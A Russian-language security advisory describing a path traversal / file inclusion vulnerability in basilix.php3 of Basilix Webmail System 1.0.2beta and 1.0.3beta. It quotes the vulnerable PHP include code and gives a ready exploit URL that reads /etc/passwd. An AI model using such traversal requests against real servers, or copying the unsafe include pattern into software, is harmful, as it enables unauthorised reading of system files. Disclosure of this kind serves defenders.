Уязвимость в Basilix Webmail System

Дата публикации:
09.07.2001
Дата изменения:
17.10.2006
Всего просмотров:
885
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Basilix Webmail System – простая система webmail, написанная на PHP+MySQL. В ней найдена уязвимость, присутствующая в скрипте basilix.php3:



$file = $request_id["$RequestID"];

if($file == "") exit();

include($BSX_FILESDIR . "/" . $file);

Как видно, срипт запускает файл, имя которого берется из массива request_id. Легко меняя эту строку, атакующий может прочитать любой файл, если на него будут соответствующие права:

http://beta.basilix.org/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah



Уязвимость найдена в версиях:

Basilix Webmail System 1.0.2beta

Basilix Webmail System 1.0.3beta


 


или введите имя

CAPTCHA